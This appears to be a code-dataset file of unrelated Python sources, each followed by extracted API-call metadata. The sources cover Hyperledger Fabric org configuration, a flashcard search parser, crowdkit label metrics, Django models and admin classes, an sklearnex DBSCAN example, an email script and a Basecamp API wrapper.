[((272, 293), 'wtforms.SubmitField', 'SubmitField', (['"""Submit"""'], {}), "('Submit')\n", (283, 293), False, 'from wtforms import StringField, SubmitField\n'), ((579, 601), 'wtforms.SubmitField', 'SubmitField', (['"""Sign Up"""'], {}), "('Sign Up')\n", (590, 601), False, 'from wtforms import StringField, SubmitField\n'), ((241, 255), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (253, 255), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n'), ((410, 424), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (422, 424), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n'), ((473, 487), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (485, 487), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n'), ((489, 496), 'wtforms.validators.Email', 'Email', ([], {}), '()\n', (494, 496), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n'), ((548, 562), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (560, 562), False, 'from wtforms.validators import DataRequired, EqualTo, Email\n')]
|
# -*- encoding: utf-8 -*-
#
# Copyright 2020 Yiwenlong(<EMAIL>)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import yaml
from orgconfig.msp import static_msp_support
from orgconfig.deploy import deploy_builder
from utils.fileutil import mkdir_if_need
KEY_ORGANIZATIONS = "Organizations"
KEY_PEERS = "Peers"
KEY_ORDERERS = "Orderers"
KEY_NAME = "Name"
class Node(dict):
    """A peer or orderer node description.

    Behaves like a dict of the raw config values while also exposing
    them as attributes; derives Domain and FullName from the owning
    organization and builds a deploy handler via *deploy_build*.
    """

    def __getattr__(self, item):
        # Fall back to dict lookup so raw config values read as attributes.
        return self[item]

    def __init__(self, org, msp_holder, deploy_build, **values):
        super(Node, self).__init__()
        self.update(values)
        self.Org = org
        self.Domain = "{}.{}".format(self.Name, self.Org.Domain)
        self.msp_holder = msp_holder
        self.deploy_handler = deploy_build(self, self.Org.Dir)
        self.FullName = "{}.{}".format(self.Org.Name, self.Name)
class Organization(dict):
    """A Fabric organization from the network configuration.

    Behaves like a dict of the raw config values while exposing them as
    attributes.  Construction has side effects: it creates the
    organization directory, generates its MSP material, and wraps every
    configured peer/orderer entry in a Node with a deploy handler.
    """
    def __getattr__(self, item):
        # Fall back to dict lookup so raw config values read as attributes.
        return self[item]
    def __init__(self, target_dir, msp_support=static_msp_support, **values):
        super().__init__()
        self.update(values)
        self.logger = logging.getLogger("organization")
        self.Dir = os.path.join(target_dir, self.Name)
        mkdir_if_need(self.Dir)
        self.msp_support = msp_support(self)
        self.logger.debug("Config organization: %s, mspid: %s" % (self.Name, self.MSPID))
        self.logger.debug("\tOrganization directory: %s" % self.Dir)
        # Generate the MSP certificates/keys before building the nodes.
        self.msp_support.create_msp()
        msp_holder = self.msp_support.msp_holder
        self.PeerNodes = {n[KEY_NAME]: Node(self, msp_holder.node_msp_holder(n[KEY_NAME]), deploy_builder("Peer"), **n)
                          for n in self.Peers}
        self.OrdererNodes = {o[KEY_NAME]: Node(self, msp_holder.node_msp_holder(o[KEY_NAME]), deploy_builder("Orderer"), **o)
                             for o in self.Orderers}
    def deploy_peers(self):
        # Deploy every peer node of this organization.
        for peer in self.PeerNodes.values():
            peer.deploy_handler.deploy()
    def deploy_orderers(self, genesis_block):
        # Deploy every orderer node, seeding each with the genesis block.
        for orderer in self.OrdererNodes.values():
            orderer.deploy_handler.deploy(genesis_block)
    def msp_dir(self):
        # Path of this organization's MSP directory.
        return self.msp_support.msp_holder.org_msp_dir
    def admin(self):
        # MSP holder for the organization admin identity.
        return self.msp_support.msp_holder.admin_msp_holder()
    def default_endorser(self):
        # First configured peer (dict order); used as the default endorser.
        for peer in self.PeerNodes.values():
            return peer
    def tree_walk_peers(self, invoke_func):
        # Apply invoke_func to every peer node of this organization.
        for peer in self.PeerNodes.values():
            invoke_func(peer)
def config_organizations(raw_conf, target_dir):
    """Build a name -> Organization mapping from the raw config list."""
    organizations = {}
    for raw_org in raw_conf:
        organizations[raw_org["Name"]] = Organization(target_dir, **raw_org)
    return organizations
def find_node(org_map, node):
    """Resolve an "<org>.<node>" identifier to a peer or orderer Node.

    Raises ValueError when the organization or the node is unknown.
    """
    org_name, node_name = str(node).split(".")
    if org_name not in org_map:
        raise ValueError("Organization not found: %s" % org_name)
    org = org_map[org_name]
    # Peers take precedence over orderers, mirroring the lookup order.
    for pool in (org.PeerNodes, org.OrdererNodes):
        if node_name in pool:
            return pool[node_name]
    raise ValueError("Node not found: %s" % node)
def find_user(org_map, user):
    """Resolve an "<org>.<user>" identifier to that organization's user
    MSP holder.  Raises ValueError for an unknown organization."""
    org_name, user_name = str(user).split(".")
    if org_name not in org_map:
        raise ValueError("Organization not found: %s" % org_name)
    msp_holder = org_map[org_name].msp_support.msp_holder
    return msp_holder.user_msp_holder(user_name)
|
[
"orgconfig.deploy.deploy_builder",
"os.path.join",
"logging.getLogger",
"utils.fileutil.mkdir_if_need"
] |
[((1580, 1613), 'logging.getLogger', 'logging.getLogger', (['"""organization"""'], {}), "('organization')\n", (1597, 1613), False, 'import logging\n'), ((1634, 1669), 'os.path.join', 'os.path.join', (['target_dir', 'self.Name'], {}), '(target_dir, self.Name)\n', (1646, 1669), False, 'import os\n'), ((1678, 1701), 'utils.fileutil.mkdir_if_need', 'mkdir_if_need', (['self.Dir'], {}), '(self.Dir)\n', (1691, 1701), False, 'from utils.fileutil import mkdir_if_need\n'), ((2088, 2110), 'orgconfig.deploy.deploy_builder', 'deploy_builder', (['"""Peer"""'], {}), "('Peer')\n", (2102, 2110), False, 'from orgconfig.deploy import deploy_builder\n'), ((2258, 2283), 'orgconfig.deploy.deploy_builder', 'deploy_builder', (['"""Orderer"""'], {}), "('Orderer')\n", (2272, 2283), False, 'from orgconfig.deploy import deploy_builder\n')]
|
from datetime import datetime, timedelta
import re
from typing import Union, Callable, Any
import math
import functools
from uuid import uuid4
from .typing import IParserResult
ANY_OF = {"template", "front", "mnemonic", "entry", "deck", "tag"}
IS_DATE = {"created", "modified", "nextReview"}
IS_STRING = {"template", "front", "back", "mnemonic", "deck", "tag", "entry"}
class SearchParser:
def __init__(self):
self.error = None
self.is_ = set()
self.sort_by = None
self.desc = False
def parse(self, q: str) -> IParserResult:
try:
return IParserResult(
cond=self._parse(q),
is_=self.is_,
sortBy=self.sort_by,
desc=self.desc
)
except ValueError:
return IParserResult(cond=dict())
def _parse(self, q: str):
for method in [
self._remove_brackets,
self._parse_sep(" OR "),
self._parse_sep(" "),
self._parse_neg,
self._parse_full_expr,
self._parse_partial_expr
]:
try:
return method(q.strip())
except ValueError as e:
self.error = e
raise self.error
def _remove_brackets(self, q: str):
if re.fullmatch(r"\([^)]+\)", q):
return self._parse(q[1:-1])
raise ValueError("Not bracketed")
def _parse_sep(self, sep: str):
brackets = dict()
def _escape_brackets(m):
id_ = uuid4().hex
brackets[id_] = m.group(0)
return id_
def _parse_sep_inner(q: str):
q = re.sub(r"\([^)]+\)", _escape_brackets, q)
tokens = q.split(sep)
for i, t in enumerate(tokens):
for k, v in brackets.items():
tokens[i] = tokens[i].replace(k, v)
if len(tokens) >= 2:
parsed_tokens = list(filter(lambda x: x, (self._parse(t) for t in tokens)))
if len(parsed_tokens) > 1:
k = "$or" if sep == " OR " else "$and"
return {k: parsed_tokens}
elif len(parsed_tokens) == 1:
return parsed_tokens[0]
else:
return dict()
raise ValueError(f"Not separated by '{sep}'")
return _parse_sep_inner
def _parse_neg(self, q: str):
if q and q[0] == "-":
kw = "-sortBy:"
if q.startswith(kw) and q != kw:
self.sort_by = q[len(kw):]
return None
return {"$not": self._parse(q)}
raise ValueError("Not negative")
def _parse_full_expr(self, q: str):
m = re.fullmatch(r'([\w-]+)(:|~|[><]=?|=)([\w-]+|"[^"]+")', q)
if m:
k, op, v = m.groups()
if len(v) > 2 and v[0] == '"' and v[-1] == '"':
v = v[1:-1]
else:
m1 = re.fullmatch(r"\d+(?:\.\d+)?", v)
if m1:
v = float(v)
if k == "is":
if v == "due":
k = "nextReview"
op = "<="
v = str(datetime.now())
elif v == "leech":
k = "srsLevel"
op = "="
v = 0
elif v == "new":
k = "nextReview"
v = "NULL"
elif v == "marked":
k = "tag"
op = "="
v = "marked"
else:
self.is_ = v
return None
if k in {"due", "nextReview"} and op == ":":
k = "nextReview"
op = "<="
elif k in {"created", "modified"} and op == ":":
op = ">="
elif k == "sortBy":
self.sort_by = v
return None
if v == "NULL":
return {"$or": [
{k: ""},
{k: {"$exists": False}}
]}
if k in IS_DATE:
try:
v = str(datetime.now() + parse_timedelta(v))
if op == ":":
if k == "nextReview":
op = "<="
else:
op = ">="
except ValueError:
pass
if op == ":":
if isinstance(v, str) or k in IS_STRING:
v = {"$regex": re.escape(str(v))}
elif op == "~":
v = {"$regex": str(v)}
elif op == ">=":
v = {"$gte": v}
elif op == ">":
v = {"$gt": v}
elif op == "<=":
v = {"$lte": v}
elif op == "<":
v = {"$lt": v}
return {k: v}
raise ValueError("Not full expression")
@staticmethod
def _parse_partial_expr(q: str):
if q and ":" not in q:
or_cond = []
for a in ANY_OF:
if a in IS_STRING:
or_cond.append({a: {"$regex": re.escape(q)}})
else:
or_cond.append({a: q})
or_cond.append({"@*": {"$regex": re.escape(q)}})
return {"$or": or_cond}
raise ValueError("Not partial expression")
def mongo_filter(cond: Union[str, dict]) -> Callable[[dict], bool]:
if isinstance(cond, str):
cond = SearchParser().parse(cond).cond
return mongo_filter(cond)
def inner_filter(item: dict) -> bool:
for k, v in cond.items():
if k[0] == "$":
if k == "$and":
return all(mongo_filter(x)(item) for x in v)
elif k == "$or":
return any(mongo_filter(x)(item) for x in v)
elif k == "$not":
return not mongo_filter(v)(item)
else:
item_k = dot_getter(item, k)
if isinstance(v, dict) and any(k0[0] == "$" for k0 in v.keys()):
return _mongo_compare(item_k, v)
elif isinstance(item_k, list):
if v not in item_k:
return False
elif item_k != v:
return False
return True
return inner_filter
def parse_timedelta(s: str) -> timedelta:
if s == "NOW":
return timedelta()
m = re.search("([-+]?\\d+)(\\S*)", s)
if m:
if m[2] in {"m", "min"}:
return timedelta(minutes=int(m[1]))
elif m[2] in {"h", "hr"}:
return timedelta(hours=int(m[1]))
elif m[2] in {"d"}:
return timedelta(days=int(m[1]))
elif m[2] in {"w", "wk"}:
return timedelta(weeks=int(m[1]))
elif m[2] in {"M", "mo"}:
return timedelta(days=30 * int(m[1]))
elif m[2] in {"y", "yr"}:
return timedelta(days=365 * int(m[1]))
raise ValueError("Invalid timedelta")
def sorter(sort_by: str, desc: bool) -> Callable[[Any], bool]:
def pre_cmp(a, b):
m = _sort_convert(a)
n = _sort_convert(b)
if isinstance(m, (float, int, str)):
if type(m) == type(n):
return 1 if m > n else 0 if m == n else -1
elif isinstance(m, str):
return 1
else:
return -1
else:
return 0
return functools.cmp_to_key(lambda x, y: -pre_cmp(dot_getter(x, sort_by, False), dot_getter(y, sort_by, False))
if desc else pre_cmp(dot_getter(x, sort_by, False), dot_getter(y, sort_by, False)))
def dot_getter(d: dict, k: str, get_data: bool = True) -> Any:
if k[0] == "@":
return data_getter(d, k[1:])
v = d
for kn in k.split("."):
if isinstance(v, dict):
if kn == "*":
v = list(v.values())
else:
v = v.get(kn, dict())
elif isinstance(v, list):
try:
v = v[int(kn)]
except (IndexError, ValueError):
v = None
break
else:
break
if isinstance(v, dict) and len(v) == 0:
v = None
if get_data and k not in {"nextReview", "srsLevel"}:
data = data_getter(d, k)
if data is not None:
if v is not None:
if isinstance(data, list):
if isinstance(v, list):
v = [*v, *data]
elif v is not None:
v = [v, *data]
else:
v = data
else:
if isinstance(v, list):
v = [*v, data]
elif v is not None:
v = [v, data]
else:
v = data
else:
v = data
return v
def data_getter(d: dict, k: str) -> Union[str, None]:
k = k.lower()
try:
if k == "*":
# noinspection PyTypeChecker
return [v0["value"] for v0 in d["data"] if not v0["value"].startswith("@nosearch\n")]
else:
if d["data"]:
for v0 in d["data"]:
if v0["key"].lower() == k:
return v0["value"]
except AttributeError:
pass
return None
def _mongo_compare(v, v_obj: dict) -> bool:
for op, v0 in v_obj.items():
try:
if op == "$regex":
if isinstance(v, list):
return any(re.search(str(v0), str(b), flags=re.IGNORECASE) for b in v)
else:
return re.search(str(v0), str(v), flags=re.IGNORECASE) is not None
elif op == "$substr":
if isinstance(v, list):
return any(str(v0) in str(b) for b in v)
else:
return str(v0) in str(v)
elif op == "$startswith":
if isinstance(v, list):
return any(str(b).startswith(str(v0)) for b in v)
else:
return str(v).startswith(str(v0))
elif op == "$exists":
return (v is not None) == v0
else:
try:
_v = int(v)
_v0 = int(v0)
v, v0 = _v, _v0
except ValueError:
pass
if op == "$gte":
return v >= v0
elif op == "$gt":
return v > v0
elif op == "$lte":
return v <= v0
elif op == "$lt":
return v < v0
except TypeError:
pass
return False
def _sort_convert(x) -> Union[float, str]:
if x is None:
return -math.inf
elif isinstance(x, bool):
return math.inf if x else -math.inf
elif isinstance(x, int):
return float(x)
return str(x)
|
[
"uuid.uuid4",
"re.fullmatch",
"datetime.datetime.now",
"re.escape",
"datetime.timedelta",
"re.search",
"re.sub"
] |
[((6586, 6619), 're.search', 're.search', (['"""([-+]?\\\\d+)(\\\\S*)"""', 's'], {}), "('([-+]?\\\\d+)(\\\\S*)', s)\n", (6595, 6619), False, 'import re\n'), ((1315, 1345), 're.fullmatch', 're.fullmatch', (['"""\\\\([^)]+\\\\)"""', 'q'], {}), "('\\\\([^)]+\\\\)', q)\n", (1327, 1345), False, 'import re\n'), ((2757, 2816), 're.fullmatch', 're.fullmatch', (['"""([\\\\w-]+)(:|~|[><]=?|=)([\\\\w-]+|"[^"]+")"""', 'q'], {}), '(\'([\\\\w-]+)(:|~|[><]=?|=)([\\\\w-]+|"[^"]+")\', q)\n', (2769, 2816), False, 'import re\n'), ((6565, 6576), 'datetime.timedelta', 'timedelta', ([], {}), '()\n', (6574, 6576), False, 'from datetime import datetime, timedelta\n'), ((1673, 1715), 're.sub', 're.sub', (['"""\\\\([^)]+\\\\)"""', '_escape_brackets', 'q'], {}), "('\\\\([^)]+\\\\)', _escape_brackets, q)\n", (1679, 1715), False, 'import re\n'), ((1544, 1551), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (1549, 1551), False, 'from uuid import uuid4\n'), ((2992, 3027), 're.fullmatch', 're.fullmatch', (['"""\\\\d+(?:\\\\.\\\\d+)?"""', 'v'], {}), "('\\\\d+(?:\\\\.\\\\d+)?', v)\n", (3004, 3027), False, 'import re\n'), ((3235, 3249), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3247, 3249), False, 'from datetime import datetime, timedelta\n'), ((5379, 5391), 're.escape', 're.escape', (['q'], {}), '(q)\n', (5388, 5391), False, 'import re\n'), ((4222, 4236), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (4234, 4236), False, 'from datetime import datetime, timedelta\n'), ((5252, 5264), 're.escape', 're.escape', (['q'], {}), '(q)\n', (5261, 5264), False, 'import re\n')]
|
from typing import Any, Optional, Union
import numpy as np
import pandas as pd
from crowdkit.aggregation.base_aggregator import BaseAggregator
from crowdkit.aggregation import MajorityVote
def _check_answers(answers: pd.DataFrame) -> None:
if not isinstance(answers, pd.DataFrame):
raise TypeError('Working only with pandas DataFrame')
assert 'task' in answers, 'There is no "task" column in answers'
assert 'performer' in answers, 'There is no "performer" column in answers'
assert 'label' in answers, 'There is no "label" column in answers'
def _label_probability(row: pd.Series, label: Any, n_labels: int) -> float:
"""Numerator in the Bayes formula"""
return row['skill'] if row['label'] == label else (1.0 - row['skill']) / (n_labels - 1)
def _task_consistency(row: pd.Series) -> float:
"""Posterior probability for a single task"""
return row[row['aggregated_label']] / row['denominator'] if row['denominator'] != 0 else 0.0
def consistency(answers: pd.DataFrame,
performers_skills: Optional[pd.Series] = None,
aggregator: BaseAggregator = MajorityVote(),
by_task: bool = False) -> Union[float, pd.Series]:
"""
Consistency metric: posterior probability of aggregated label given performers skills
calculated using standard Dawid-Skene model.
Args:
answers (pandas.DataFrame): A data frame containing `task`, `performer` and `label` columns.
performers_skills (Optional[pandas.Series]): performers skills e.g. golden set skills. If not provided,
uses aggregator's `performers_skills` attribute.
aggregator (aggregation.BaseAggregator): aggregation method, default: MajorityVote
by_task (bool): if set, returns consistencies for every task in provided data frame.
Returns:
Union[float, pd.Series]
"""
_check_answers(answers)
aggregated = aggregator.fit_predict(answers)
if performers_skills is None and hasattr(aggregator, 'skills_'):
performers_skills = aggregator.skills_
else:
raise AssertionError('This aggregator is not supported. Please, provide performers skills.')
answers = answers.copy(deep=False)
answers.set_index('task', inplace=True)
answers = answers.reset_index().set_index('performer')
answers['skill'] = performers_skills
answers.reset_index(inplace=True)
labels = pd.unique(answers.label)
for label in labels:
answers[label] = answers.apply(lambda row: _label_probability(row, label, len(labels)), axis=1)
labels_proba = answers.groupby('task').prod()
labels_proba['aggregated_label'] = aggregated
labels_proba['denominator'] = labels_proba[list(labels)].sum(axis=1)
consistecies = labels_proba.apply(_task_consistency, axis=1)
if by_task:
return consistecies
else:
return consistecies.mean()
def _task_uncertainty(row, labels):
if row['denominator'] == 0:
row[labels] = 1 / len(labels)
else:
row[labels] /= row['denominator']
softmax = row[labels]
log_softmax = np.log(row[list(labels)])
return -np.sum(softmax * log_softmax)
def uncertainty(answers, performers_skills, by_task: bool = False) -> Union[float, pd.Series]:
"""
Label uncertainty metric: entropy of labels probability distribution.
Args:
answers (pandas.DataFrame): A data frame containing `task`, `performer` and `label` columns.
performers_skills (pandas.Series): performers skills e.g. golden set skills. If not provided,
uses aggregator's `performers_skills` attribute.
by_task (bool): if set, returns consistencies for every task in provided data frame.
Returns:
Union[float, pd.Series]
"""
_check_answers(answers)
answers = answers.copy(deep=False)
answers.set_index('task', inplace=True)
answers = answers.reset_index().set_index('performer')
answers['skill'] = performers_skills
answers.reset_index(inplace=True)
labels = pd.unique(answers.label)
for label in labels:
answers[label] = answers.apply(lambda row: _label_probability(row, label, len(labels)), axis=1)
labels_proba = answers.groupby('task').prod()
labels_proba['denominator'] = labels_proba[list(labels)].sum(axis=1)
uncertainties = labels_proba.apply(lambda row: _task_uncertainty(row, list(labels)), axis=1)
if by_task:
return uncertainties
else:
return uncertainties.mean()
|
[
"crowdkit.aggregation.MajorityVote",
"numpy.sum",
"pandas.unique"
] |
[((1127, 1141), 'crowdkit.aggregation.MajorityVote', 'MajorityVote', ([], {}), '()\n', (1139, 1141), False, 'from crowdkit.aggregation import MajorityVote\n'), ((2446, 2470), 'pandas.unique', 'pd.unique', (['answers.label'], {}), '(answers.label)\n', (2455, 2470), True, 'import pandas as pd\n'), ((4086, 4110), 'pandas.unique', 'pd.unique', (['answers.label'], {}), '(answers.label)\n', (4095, 4110), True, 'import pandas as pd\n'), ((3170, 3199), 'numpy.sum', 'np.sum', (['(softmax * log_softmax)'], {}), '(softmax * log_softmax)\n', (3176, 3199), True, 'import numpy as np\n')]
|
from __future__ import unicode_literals, absolute_import
from django.contrib import admin
from . import models
@admin.register(models.Annotation)
class AnnotationAdmin(admin.ModelAdmin):
search_fields = ('text',)
fields = (
'user',
'text_object',
'annotator_schema_version',
'text',
'quote',
'uri',
'range_start',
'range_end',
'range_start_offset',
'range_end_offset',
'tags',
)
|
[
"django.contrib.admin.register"
] |
[((116, 149), 'django.contrib.admin.register', 'admin.register', (['models.Annotation'], {}), '(models.Annotation)\n', (130, 149), False, 'from django.contrib import admin\n')]
|
# Copyright 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sklearnex import patch_sklearn
patch_sklearn()
import numpy as np
from sklearn.cluster import DBSCAN
from daal4py.oneapi import sycl_context
X = np.array([[1., 2.], [2., 2.], [2., 3.],
[8., 7.], [8., 8.], [25., 80.]], dtype=np.float32)
with sycl_context("gpu"):
clustering = DBSCAN(eps=3, min_samples=2).fit(X)
print("DBSCAN components: ", clustering.components_, "\nDBSCAN labels: ",clustering.labels_)
resultsDict = {}
resultsDict['X'] = X
resultsDict['labels'] = clustering.labels_
resultsDict['components'] = clustering.components_
import pickle
with open('resultsDict.pkl', 'wb') as handle:
pickle.dump(resultsDict, handle, protocol=pickle.HIGHEST_PROTOCOL)
|
[
"pickle.dump",
"numpy.array",
"daal4py.oneapi.sycl_context",
"sklearnex.patch_sklearn",
"sklearn.cluster.DBSCAN"
] |
[((620, 635), 'sklearnex.patch_sklearn', 'patch_sklearn', ([], {}), '()\n', (633, 635), False, 'from sklearnex import patch_sklearn\n'), ((736, 842), 'numpy.array', 'np.array', (['[[1.0, 2.0], [2.0, 2.0], [2.0, 3.0], [8.0, 7.0], [8.0, 8.0], [25.0, 80.0]]'], {'dtype': 'np.float32'}), '([[1.0, 2.0], [2.0, 2.0], [2.0, 3.0], [8.0, 7.0], [8.0, 8.0], [25.0,\n 80.0]], dtype=np.float32)\n', (744, 842), True, 'import numpy as np\n'), ((844, 863), 'daal4py.oneapi.sycl_context', 'sycl_context', (['"""gpu"""'], {}), "('gpu')\n", (856, 863), False, 'from daal4py.oneapi import sycl_context\n'), ((1208, 1274), 'pickle.dump', 'pickle.dump', (['resultsDict', 'handle'], {'protocol': 'pickle.HIGHEST_PROTOCOL'}), '(resultsDict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n', (1219, 1274), False, 'import pickle\n'), ((882, 910), 'sklearn.cluster.DBSCAN', 'DBSCAN', ([], {'eps': '(3)', 'min_samples': '(2)'}), '(eps=3, min_samples=2)\n', (888, 910), False, 'from sklearn.cluster import DBSCAN\n')]
|
#!/usr/bin/python3
from django.core.validators import MinValueValidator, MaxValueValidator
from django.db import models
class SolenoidValve(models.Model):
"""
Model for the solenoid valves in database
"""
number = models.IntegerField(validators=[MinValueValidator(1),
MaxValueValidator(6)])
step = models.IntegerField()
first_pin = models.IntegerField()
second_pin = models.IntegerField()
class Bottle(models.Model):
"""
Model for the bottles in database
"""
name = models.CharField(max_length=80)
empty = models.BooleanField(default=False)
image = models.ImageField(upload_to='bottle_picture', blank=True, null=True, )
solenoid_valve = models.OneToOneField(SolenoidValve, on_delete=models.CASCADE)
def __str__(self):
return self.name
class Cocktail(models.Model):
"""
Model for the cocktails in database
"""
name = models.CharField(max_length=80)
description = models.TextField()
bottles = models.ManyToManyField(Bottle,
through='BottlesBelongsCocktails',
related_name='cocktails')
image = models.ImageField(upload_to='cocktail_picture', blank=True, null=True, )
def __str__(self):
return self.name
class BottlesBelongsCocktails(models.Model):
"""
Model for the relation many to many between cocktail and bottle
"""
bottle = models.ForeignKey(Bottle, on_delete=models.CASCADE)
cocktail = models.ForeignKey(Cocktail, on_delete=models.CASCADE)
dose = models.IntegerField()
@property
def bottle_detail(self):
"""
:return the name of bottle
"""
return '{}'.format(self.bottle)
@property
def cocktail_detail(self):
"""
:return the name of cocktail
"""
return '{}'.format(self.cocktail)
@property
def dose_detail(self):
"""
:return the number of dose
"""
return '{}'.format(self.dose)
def __str__(self):
return str(self.dose)
|
[
"django.db.models.OneToOneField",
"django.db.models.TextField",
"django.db.models.ManyToManyField",
"django.db.models.CharField",
"django.db.models.ForeignKey",
"django.core.validators.MinValueValidator",
"django.db.models.BooleanField",
"django.db.models.ImageField",
"django.db.models.IntegerField",
"django.core.validators.MaxValueValidator"
] |
[((365, 386), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (384, 386), False, 'from django.db import models\n'), ((403, 424), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (422, 424), False, 'from django.db import models\n'), ((442, 463), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (461, 463), False, 'from django.db import models\n'), ((562, 593), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(80)'}), '(max_length=80)\n', (578, 593), False, 'from django.db import models\n'), ((606, 640), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (625, 640), False, 'from django.db import models\n'), ((653, 721), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""bottle_picture"""', 'blank': '(True)', 'null': '(True)'}), "(upload_to='bottle_picture', blank=True, null=True)\n", (670, 721), False, 'from django.db import models\n'), ((745, 806), 'django.db.models.OneToOneField', 'models.OneToOneField', (['SolenoidValve'], {'on_delete': 'models.CASCADE'}), '(SolenoidValve, on_delete=models.CASCADE)\n', (765, 806), False, 'from django.db import models\n'), ((958, 989), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(80)'}), '(max_length=80)\n', (974, 989), False, 'from django.db import models\n'), ((1008, 1026), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (1024, 1026), False, 'from django.db import models\n'), ((1041, 1136), 'django.db.models.ManyToManyField', 'models.ManyToManyField', (['Bottle'], {'through': '"""BottlesBelongsCocktails"""', 'related_name': '"""cocktails"""'}), "(Bottle, through='BottlesBelongsCocktails',\n related_name='cocktails')\n", (1063, 1136), False, 'from django.db import models\n'), ((1219, 1289), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': '"""cocktail_picture"""', 'blank': '(True)', 
'null': '(True)'}), "(upload_to='cocktail_picture', blank=True, null=True)\n", (1236, 1289), False, 'from django.db import models\n'), ((1489, 1540), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Bottle'], {'on_delete': 'models.CASCADE'}), '(Bottle, on_delete=models.CASCADE)\n', (1506, 1540), False, 'from django.db import models\n'), ((1556, 1609), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Cocktail'], {'on_delete': 'models.CASCADE'}), '(Cocktail, on_delete=models.CASCADE)\n', (1573, 1609), False, 'from django.db import models\n'), ((1621, 1642), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (1640, 1642), False, 'from django.db import models\n'), ((264, 284), 'django.core.validators.MinValueValidator', 'MinValueValidator', (['(1)'], {}), '(1)\n', (281, 284), False, 'from django.core.validators import MinValueValidator, MaxValueValidator\n'), ((331, 351), 'django.core.validators.MaxValueValidator', 'MaxValueValidator', (['(6)'], {}), '(6)\n', (348, 351), False, 'from django.core.validators import MinValueValidator, MaxValueValidator\n')]
|
import smtplib #Python Library
print("Subject?")
sub=input() #Used to take subject
print("Body?")
message = input() #Used for taking message for email
print("Recipient")
receivers_mail = input() #Used to take receiver's mail
print("Sender's Mail?")
sender_mail= input() #Used to take sender's mail
try:
password = input('Enter the password') #Enter password of sender's email ID
smtpObj = smtplib.SMTP('gmail.com',587)
smtpObj.login(sender_mail,password)
smtpObj.sendmail(sender_mail, receivers_mail, message)
print("Successfully sent email") #If the email is sent successfullt
except Exception:
print("Error: unable to send email") #If the email is not successful
|
[
"smtplib.SMTP"
] |
[((470, 500), 'smtplib.SMTP', 'smtplib.SMTP', (['"""gmail.com"""', '(587)'], {}), "('gmail.com', 587)\n", (482, 500), False, 'import smtplib\n')]
|
import requests
from endpoints.projects import Projects
from endpoints.lists import Lists
from endpoints.todos import Todos
from endpoints.labels import Labels
class Tracked:
def __init__(self, email_address: str, api_token: str, basecamp_account_id: int):
self.email_address = email_address
self.api_token = api_token
self.basecamp_account_id = basecamp_account_id
self.session = requests.Session()
@property
def projects(self):
return Projects(self)
@property
def lists(self):
return Lists(self)
@property
def todos(self):
return Todos(self)
@property
def labels(self):
return Labels(self)
"""
========================================================
Examples
========================================================
tracked = Tracked(...)
# === PROJECTS ===
# Get all projects
tracked.projects.list()
# === LISTS ===
# Get all lists for a project
tracked.lists.list(project_id)
# === TODOS ===
# List todos from project
tracked.todos.list(project_id)
# Update Kanban list and/or position for a to-do
tracked.todos.update(project_id, todo_id, position, list_name)
# === LABELS ===
# Create a label
tracked.labels.create(project_id, "TestLabel", "#00ffff")
# List labels
tracked.labels.list(project_id)
# Add a label to a todo
tracked.labels.add(project_id, label_id, todo_id)
# Get labels of a todo
tracked.labels.get(basecamp_project_id, basecamp_todo_id)
========================================================
"""
|
[
"endpoints.projects.Projects",
"requests.Session",
"endpoints.lists.Lists",
"endpoints.todos.Todos",
"endpoints.labels.Labels"
] |
[((420, 438), 'requests.Session', 'requests.Session', ([], {}), '()\n', (436, 438), False, 'import requests\n'), ((493, 507), 'endpoints.projects.Projects', 'Projects', (['self'], {}), '(self)\n', (501, 507), False, 'from endpoints.projects import Projects\n'), ((559, 570), 'endpoints.lists.Lists', 'Lists', (['self'], {}), '(self)\n', (564, 570), False, 'from endpoints.lists import Lists\n'), ((622, 633), 'endpoints.todos.Todos', 'Todos', (['self'], {}), '(self)\n', (627, 633), False, 'from endpoints.todos import Todos\n'), ((686, 698), 'endpoints.labels.Labels', 'Labels', (['self'], {}), '(self)\n', (692, 698), False, 'from endpoints.labels import Labels\n')]
|
from django.contrib import admin
from .models import Blog
# Blog information
class BlogAdmin(admin.ModelAdmin):
list_display = (
'name',
'author',
'description',
'image',
)
ordering = ('name',)
admin.site.register(Blog, BlogAdmin)
|
[
"django.contrib.admin.site.register"
] |
